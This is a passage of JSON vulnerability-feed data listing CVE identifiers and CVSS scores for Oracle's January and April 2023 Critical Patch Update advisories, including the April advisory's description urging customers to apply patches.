"CVE-2023-21873", "CVE-2023-21874", "CVE-2023-21875", "CVE-2023-21876", "CVE-2023-21877", "CVE-2023-21878", "CVE-2023-21879", "CVE-2023-21880", "CVE-2023-21881", "CVE-2023-21882", "CVE-2023-21883", "CVE-2023-21884", "CVE-2023-21885", "CVE-2023-21886", "CVE-2023-21887", "CVE-2023-21888", "CVE-2023-21889", "CVE-2023-21890", "CVE-2023-21891", "CVE-2023-21892", "CVE-2023-21893", "CVE-2023-21894", "CVE-2023-21898", "CVE-2023-21899", "CVE-2023-21900"], "modified": "2023-02-27T00:00:00", "id": "ORACLE:CPUJAN2023", "href": "https://www.oracle.com/security-alerts/cpujan2023.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-09T20:03:51", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 433 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ April 2023 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2921644.1>).\n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-04-18T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - April 2023", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000656", "CVE-2018-1311", "CVE-2018-14371", "CVE-2018-18074", "CVE-2018-20060", "CVE-2018-20225", "CVE-2018-25032", "CVE-2019-10086", "CVE-2019-10172", "CVE-2019-11287", "CVE-2019-12402", "CVE-2019-12415", "CVE-2019-17091", "CVE-2019-18935", "CVE-2019-20388", "CVE-2019-20907", "CVE-2019-20916", "CVE-2020-10693", "CVE-2020-10735", "CVE-2020-11979", "CVE-2020-11987", "CVE-2020-11988", "CVE-2020-13936", "CVE-2020-13954", "CVE-2020-14343", "CVE-2020-15250", "CVE-2020-15522", "CVE-2020-17521", "CVE-2020-1945", "CVE-2020-24977", "CVE-2020-25638", "CVE-2020-25649", "CVE-2020-28052", "CVE-2020-28500", "CVE-2020-29504", "CVE-2020-29506", "CVE-2020-29507", "CVE-2020-29508", "CVE-2020-35163", "CVE-2020-35164", "CVE-2020-35165", "CVE-2020-35166", "CVE-2020-35167", "CVE-2020-35168", "CVE-2020-35169", "CVE-2020-35490", "CVE-2020-35491", "CVE-2020-35728", "CVE-2020-36179", "CVE-2020-36180", "CVE-2020-36181", "CVE-2020-36182", "CVE-2020-36183", "CVE-2020-36184", "CVE-2020-36185", "CVE-2020-36186", "CVE-2020-36187", "CVE-2020-36188", "CVE-2020-36189", "CVE-2020-36518", "CVE-2020-6950", "CVE-2020-7009", "CVE-2020-7595", "CVE-2020-7712", "CVE-2020-8908", "CVE-2021-21575", "CVE-2021-22569", "CVE-2021-23017", "CVE-2021-23337", "CVE-2021-23413", "CVE-2021-2351", "CVE-2021-23926", "CVE-2021-27568", "CVE-2021-28168", "CVE-2021-29425", "CVE-2021-29921", "CVE-2021-30129", "CVE-2021-31684", "CVE-2021-32808", "CVE-2021-32809", "CVE-2021-33560", "CVE-2021-34798", "CVE-2021-35043", "CVE-2021-3517", "CVE-2021-3518", "CVE-2021-3537", "CVE-2021-35515", "CVE-2021-35516", "CVE-2021-35517", "CVE-2021-36090", "CVE-2021-36373", "CVE-2021-36374", "CVE-2021-3712", "CVE-2021-37136", "CVE-2021-37137", "CVE-2021-37519", "CVE-2021-37533", "CVE-2021-37695", "CVE-2021-38604", "CVE-2021-3918", "CVE-2021-4048", "CVE-2021-40528", "CVE-2021-40690", "CVE-2021-4104", "CVE-2021-41182", "CVE-2021-41183", "CVE-2021-41184", "CVE-2021-41973", "CVE-2021-42575", "CVE-2021-43396", "CVE-2021-43859", "CVE-2021-44531", "CVE-2021-44532", "CVE-2021-44533", "CVE-2021-44832", "CVE-2021-46848", "CVE-2022-1292", "CVE-2022-1471", "CVE-2022-1586", "CVE-2022-1587", "CVE-2022-2047", "CVE-2022-2048", "CVE-2022-2068", "CVE-2022-2097", "CVE-2022-21824", "CVE-2022-2191", "CVE-2022-2274", "CVE-2022-22950", "CVE-2022-22965", "CVE-2022-22970", "CVE-2022-22971", "CVE-2022-22976", "CVE-2022-22978", "CVE-2022-22979", "CVE-2022-23181", "CVE-2022-23218", "CVE-2022-23219", "CVE-2022-23221", "CVE-2022-23302", "CVE-2022-23305", "CVE-2022-23307", "CVE-2022-23308", "CVE-2022-23437", "CVE-2022-23457", "CVE-2022-23491", "CVE-2022-24675", "CVE-2022-24728", "CVE-2022-24729", "CVE-2022-24823", "CVE-2022-24839", "CVE-2022-24891", "CVE-2022-25235", "CVE-2022-25236", "CVE-2022-25313", "CVE-2022-25314", "CVE-2022-25315", "CVE-2022-25647", "CVE-2022-25857", "CVE-2022-26336", "CVE-2022-27404", "CVE-2022-27405", "CVE-2022-27406", "CVE-2022-27778", "CVE-2022-27779", "CVE-2022-27780", "CVE-2022-27781", "CVE-2022-27782", "CVE-2022-28199", "CVE-2022-28327", "CVE-2022-28614", "CVE-2022-28738", "CVE-2022-28739", "CVE-2022-2879", "CVE-2022-2880", "CVE-2022-29078", "CVE-2022-29577", "CVE-2022-29599", "CVE-2022-29824", "CVE-2022-30115", "CVE-2022-31081", "CVE-2022-31123", "CVE-2022-31129", "CVE-2022-31130", "CVE-2022-31160", "CVE-2022-31630", "CVE-2022-31690", "CVE-2022-31692", "CVE-2022-3171", "CVE-2022-32212", "CVE-2022-32213", "CVE-2022-32215", "CVE-2022-32222", "CVE-2022-3358", "CVE-2022-33980", "CVE-2022-34169", "CVE-2022-34305", "CVE-2022-3479", "CVE-2022-34917", "CVE-2022-35737", "CVE-2022-3602", "CVE-2022-36033", "CVE-2022-36760", "CVE-2022-37434", "CVE-2022-37436", "CVE-2022-37454", "CVE-2022-3786", "CVE-2022-37865", "CVE-2022-37866", "CVE-2022-3821", "CVE-2022-38749", "CVE-2022-38750", "CVE-2022-38751", "CVE-2022-38752", "CVE-2022-39135", "CVE-2022-39201", "CVE-2022-39229", "CVE-2022-39271", "CVE-2022-40146", "CVE-2022-40149", "CVE-2022-40150", "CVE-2022-40151", "CVE-2022-40152", "CVE-2022-40303", "CVE-2022-40304", "CVE-2022-41704", "CVE-2022-41715", "CVE-2022-41881", "CVE-2022-41915", "CVE-2022-41966", "CVE-2022-42003", "CVE-2022-42004", "CVE-2022-42252", "CVE-2022-42889", "CVE-2022-42890", "CVE-2022-42898", "CVE-2022-42915", "CVE-2022-42916", "CVE-2022-42919", "CVE-2022-4304", "CVE-2022-43401", "CVE-2022-43402", "CVE-2022-43548", "CVE-2022-43551", "CVE-2022-43680", "CVE-2022-4415", "CVE-2022-4450", "CVE-2022-45047", "CVE-2022-45061", "CVE-2022-45143", "CVE-2022-45685", "CVE-2022-45693", "CVE-2022-46363", "CVE-2022-46364", "CVE-2022-46908", "CVE-2022-47629", "CVE-2023-0215", "CVE-2023-0286", "CVE-2023-0361", "CVE-2023-0567", "CVE-2023-0568", "CVE-2023-0662", "CVE-2023-1370", "CVE-2023-21896", "CVE-2023-21902", "CVE-2023-21903", "CVE-2023-21904", "CVE-2023-21905", "CVE-2023-21906", "CVE-2023-21907", "CVE-2023-21908", "CVE-2023-21909", "CVE-2023-21910", "CVE-2023-21911", "CVE-2023-21912", "CVE-2023-21913", "CVE-2023-21915", "CVE-2023-21916", "CVE-2023-21917", "CVE-2023-21918", "CVE-2023-21919", "CVE-2023-21920", "CVE-2023-21921", "CVE-2023-21922", "CVE-2023-21923", "CVE-2023-21924", "CVE-2023-21925", "CVE-2023-21926", "CVE-2023-21927", "CVE-2023-21928", "CVE-2023-21929", "CVE-2023-21930", "CVE-2023-21931", "CVE-2023-21932", "CVE-2023-21933", "CVE-2023-21934", "CVE-2023-21935", "CVE-2023-21936", "CVE-2023-21937", "CVE-2023-21938", "CVE-2023-21939", "CVE-2023-21940", "CVE-2023-21941", "CVE-2023-21942", "CVE-2023-21943", "CVE-2023-21944", "CVE-2023-21945", "CVE-2023-21946", "CVE-2023-21947", "CVE-2023-21948", "CVE-2023-21952", "CVE-2023-21953", "CVE-2023-21954", "CVE-2023-21955", "CVE-2023-21956", "CVE-2023-21959", "CVE-2023-21960", "CVE-2023-21962", "CVE-2023-21963", "CVE-2023-21964", "CVE-2023-21965", "CVE-2023-21966", "CVE-2023-21967", "CVE-2023-21968", "CVE-2023-21969", "CVE-2023-21970", "CVE-2023-21971", "CVE-2023-21972", "CVE-2023-21973", "CVE-2023-21976", "CVE-2023-21977", "CVE-2023-21978", "CVE-2023-21979", "CVE-2023-21980", "CVE-2023-21981", "CVE-2023-21982", "CVE-2023-21984", "CVE-2023-21985", "CVE-2023-21986", "CVE-2023-21987", "CVE-2023-21988", "CVE-2023-21989", "CVE-2023-21990", "CVE-2023-21991", "CVE-2023-21992", "CVE-2023-21993", "CVE-2023-21996", "CVE-2023-21997", "CVE-2023-21998", "CVE-2023-21999", "CVE-2023-22000", "CVE-2023-22001", "CVE-2023-22002", "CVE-2023-22003", "CVE-2023-22899", "CVE-2023-23914", "CVE-2023-23915", "CVE-2023-23916", "CVE-2023-23918", "CVE-2023-23919", "CVE-2023-23920", "CVE-2023-23931", "CVE-2023-23934", "CVE-2023-23936", "CVE-2023-24998", "CVE-2023-25136", "CVE-2023-25194", "CVE-2023-25577", "CVE-2023-25613", "CVE-2023-25690", "CVE-2023-27522", "CVE-2023-28708"], "modified": "2023-04-25T00:00:00", "id": "ORACLE:CPUAPR2023", "href": "https://www.oracle.com/security-alerts/cpuapr2023.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}